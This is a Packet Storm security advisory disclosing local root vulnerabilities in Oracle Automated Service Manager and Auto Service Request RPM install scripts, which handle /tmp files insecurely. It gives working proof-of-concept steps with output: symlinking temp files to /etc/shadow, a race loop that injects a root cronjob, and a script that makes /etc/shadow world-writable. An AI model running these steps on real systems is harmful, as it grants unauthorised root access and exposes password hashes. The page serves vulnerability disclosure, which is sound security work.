what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Oracle Automated Service Manager 1.3 Local Root

Oracle Automated Service Manager 1.3 Local Root
Posted Feb 1, 2013
Authored by Larry W. Cashdollar

Oracle Automated Service Manager version 1.3 suffers from a local root privilege escalation vulnerability during install.

tags | exploit, local, root
SHA-256 | 541a2508bc332207de3f68c469abd43870d40347d9628cf361e59c570beb5ac0

Oracle Automated Service Manager 1.3 Local Root

Change Mirror Download
Oracle Automated Service Manager 1.3 local root during install

Larry W. Cashdollar
1/29/2013
@_larry0


SUNWsasm-1.3.1-20110815093723

https://updates.oracle.com/Orion/Services/download?type=readme&aru=15864534

From the README:
"Oracle Automated Service Manager 1.3.1

Oracle Automated Service Manager is the service management container for Auto Service Request and Secure File Transport. It provides platform services (such as logging, data transport and persistence) to business services that are deployed to it."

Possible issues with files in /tmp.

root@dev-unix-sec01:~/test# strings SUNWswasr-4.3.1-20130117131218.rpm |grep tmp

##Read the contents of crontab into a tmp file /usr/bin/crontab -l > /tmp/crontab_edit echo "0" > /tmp/tmpVariable
grep "/opt/SUNWswasr/bin/update_rules.sh" /tmp/crontab_edit |

echo "1" > /tmp/tmpVariable
grep "0" /tmp/tmpVariable > /dev/null

echo >> /tmp/crontab_edit
echo "##Cronjob entry for ASR Auto Rules Update" >> /tmp/crontab_edit
echo "$min $hour * * * /opt/SUNWswasr/bin/update_rules.sh" >> /tmp/crontab_edit

ASR_STAT_REP=`/bin/grep -c 'bin/asr report' /tmp/crontab_edit`

sed "/asr report/d" /tmp/crontab_edit > /tmp/asrtab1.??? mv /tmp/asrtab1.??? /tmp/crontab_edit sed "/ASR Status Report/d" /tmp/crontab_edit > /tmp/asrtab1.??? mv /tmp/asrtab1.??? /tmp/crontab_edit ASR_HEARTBEAT=`/bin/grep -c 'bin/asr heartbeat' /tmp/crontab_edit`

sed "/asr heartbeat/d" /tmp/crontab_edit > /tmp/asrtab1.??? mv /tmp/asrtab1.??? /tmp/crontab_edit sed "/ASR Heartbeat/d" /tmp/crontab_edit > /tmp/asrtab1.??? mv /tmp/asrtab1.??? /tmp/crontab_edit /usr/bin/crontab /tmp/crontab_edit
## Finally remove the tmp file
rm -f /tmp/tmpVariable
rm -f /tmp/crontab_edit

tempFile=/tmp/localsnmp_`date '+%m%d%y%H%M%SOURCE'` /usr/bin/crontab -l > /tmp/asrtab.??
UPDATE_RULES=`/bin/grep -c 'bin/update_rules.sh' /tmp/asrtab.??`

sed "/update_rules.sh/d" /tmp/asrtab.?? > /tmp/asrtab.??? mv /tmp/asrtab.??? /tmp/asrtab.??
sed "/ASR Auto Rules/d" /tmp/asrtab.?? > /tmp/asrtab.??? mv /tmp/asrtab.??? /tmp/asrtab.??
ASR_STAT_HB=`/bin/grep -c 'bin/asr' /tmp/asrtab.??`

sed "/asr report/d" /tmp/asrtab.?? > /tmp/asrtab.??? mv /tmp/asrtab.??? /tmp/asrtab.??
sed "/ASR Status Report/d" /tmp/asrtab.?? > /tmp/asrtab.??? mv /tmp/asrtab.??? /tmp/asrtab.??
sed "/asr heartbeat/d" /tmp/asrtab.?? > /tmp/asrtab.??? mv /tmp/asrtab.??? /tmp/asrtab.??
sed "/ASR Heartbeat/d" /tmp/asrtab.?? > /tmp/asrtab.??? mv /tmp/asrtab.??? /tmp/asrtab.??
/usr/bin/crontab /tmp/asrtab.??
rm /tmp/asrtab.??
]!tmpD
root@dev-unix-sec01:~/test#
First try, File overwriting vulnerability

$ ln -s /etc/shadow /tmp/mytab-tmp.??
$ ln -s /etc/shadow /tmp/mytab.??

[root@oracle-lnx-lab02 ~]# rpm -Uvh SUNWsasm-1.3.1-20110815093723.rpm
Preparing...
########################################### [100%]

Copyright 2008,2011 Oracle and/or its affiliates. All rights reserved.

License and Terms of Use for this software are described at https://support.oracle.com/ (see Terms o f Use)

1:SUNWsasm ########################################### [100%]

Authentication service cannot retrieve authentication info You (root) are not allowed to access to (/usr/bin/crontab) because of pam configuration.

Authentication service cannot retrieve authentication info You (root) are not allowed to access to (/usr/bin/crontab) because of pam configuration.

[root@oracle-lnx-lab02 ~]# cat /etc/shadow
0,12,24,36,48 * * * * /opt/SUNWsasm/bin/sasm start-instance > /dev/null 2>&1

Ok, lets try to inject a cronjob and get root:

Malicious user does:

[meanie@oracle-lnx-lab02 ~]$ while (true) ;do echo "* * * * * /tmp/rootme" > /tmp/mytab.??; done

[root@oracle-lnx-lab02 ~]# rpm -Uvh SUNWsasm-1.3.1-20110815093723.rpm
Preparing...
########################################### [100%]

Copyright 2008,2011 Oracle and/or its affiliates. All rights reserved.

License and Terms of Use for this software are described at https://support.oracle.com/ (see Terms o f Use)

1:SUNWsasm ########################################## [100%]
[root@oracle-lnx-lab02 ~] crontab -l
* * * * * /tmp/rootme
0,12,24,36,48 * * * * /opt/SUNWsasm/bin/sasm start-instance > /dev/null 2>&1

/tmp/rootme is:

#!/bin/sh

chmod 666 /etc/shadow

after a minute:

[root@oracle-lnx-lab02 ~] ls -l /etc/shadow

-rw-rw-rw- 1 root root 744 Jan 30 21:02 /etc/shadow

[root@oracle-lnx-lab02 ~]

Faulty Code:

319 /usr/bin/crontab -l > /tmp/mytab.??

320 if [ $(/bin/grep -c 'sasm' /tmp/mytab.??) -eq 0 ];then

321 echo "0,12,24,36,48 * * * * /opt/SUNWsasm/bin/sasm start-instance > /dev/null 2>&1" >> /tmp/mytab.??

322 /usr/bin/crontab /tmp/mytab.??

323 fi

324

325 rm /tmp/mytab.??


SUNWswasr RPM post install /tmp race condition


From the documentation:

"Auto Service Request (ASR) is a secure, scalable, customer-installable software feature of warranty and Oracle Support Services that provides auto-case generation when common hardware component faults occur. ASR is designed to enable faster problem resolution by eliminating the need to initiate contact with Oracle Support Services for common hardware component failures, reducing both the number of phone calls needed and overall phone time required. ASR also simplifies support operations by using electronic diagnostic data. Easily installed and deployed, ASR is completely controlled by you, the customer, to ensure security. ASR is applicable only for component faults. Not all component failures are covered, though the most common components (such as disk, fan, and power supplies) are covered."

The post-install script for SUNWswasr RPM handles files in /tmp insecurely.

I suspect a race condition exists where these two files can be used to either clobber root owned files or inject malicious cronjobs into roots cron:

/tmp/tmpVariable
/tmp/crontab_edit

[root@oracle-lnx-lab02 ~]# rpm -Uvh SUNWswasr-4.3.1-20130117131218.rpm Preparing... ########################################### [100%]

Copyright [2008,2012], Oracle and/or its affiliates. All rights reserved.

License and Terms of Use for this software are described at https://support.oracle.com/ (see Legal Notices and Terms of Use).

1:SUNWswasr ########################################### [100%]
Directory /var/opt/SUNWsasm/configuration/caseinfo created.
Directory /var/opt/SUNWsasm/configuration/supportfile created.
ASR Manager Auto Update functionality has been enabled by default.
Please ensure that ASR manager is registered with ASR backend to get the software updates.
Installation of SUNWswasr was successful.

Lets fireup fsnoop[1] and take a look:

[C] -rw-r--r-- 1 root root 0 Thu Jan 31 14:30:12 2013 /tmp/crontab_edit
[U] -rw-r--r-- 1 root root 100 Thu Jan 31 14:30:12 2013 /tmp/crontab_edit
[C] -rw-r--r-- 1 root root 0 Thu Jan 31 14:30:12 2013 /tmp/tmpVariable
[U] -rw-r--r-- 1 root root 2 Thu Jan 31 14:30:12 2013 /tmp/tmpVariable
[U] -rw-r--r-- 1 root root 101 Thu Jan 31 14:30:12 2013 /tmp/crontab_edit
[U] -rw-r--r-- 1 root root 143 Thu Jan 31 14:30:12 2013 /tmp/crontab_edit
[U] -rw-r--r-- 1 root root 188 Thu Jan 31 14:30:12 2013 /tmp/crontab_edit
[D] F /tmp/tmpVariable
[D] F /tmp/crontab_edit

Those look exploitable lets pick one.

I was able to inject my own cronjob in as root with the following simple PoC:

$ while (true) ;do echo "* * * * * /tmp/rootme" >> /tmp/crontab_edit; done

[root@oracle-lnx-lab02 ~]# crontab -l
0,12,24,36,48 * * * * /opt/SUNWsasm/bin/sasm start-instance > /dev/null 2>&1
* * * * * /tmp/rootme <--- prepended and contains our malicious shell/binary, see exploit above.

##Cronjob entry for ASR Auto Rules Update
7 3 * * * /opt/SUNWswasr/bin/update_rules.sh

The uninstall script is just as sloppy:

[C] F /tmp/asrtab.??
[U] F /tmp/asrtab.??
[C] F /tmp/asrtab.???
[U] F /tmp/asrtab.???
[C] F /tmp/asrtab.???
[U] F /tmp/asrtab.???
[D] F /tmp/asrtab.??

did they mean to use $$ for process Pid?
References:


[1] fsnoop - /tmp directory file watching utility by vl4dz. http://vladz.devzero.fr/fsnoop.php

http://docs.oracle.com/cd/E18476_01/doc.220/e18478/asr.htm#BABHIHFF
http://vapid.dhs.org/advisories/Oracle_ASR_4.3.1-root-install.html
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close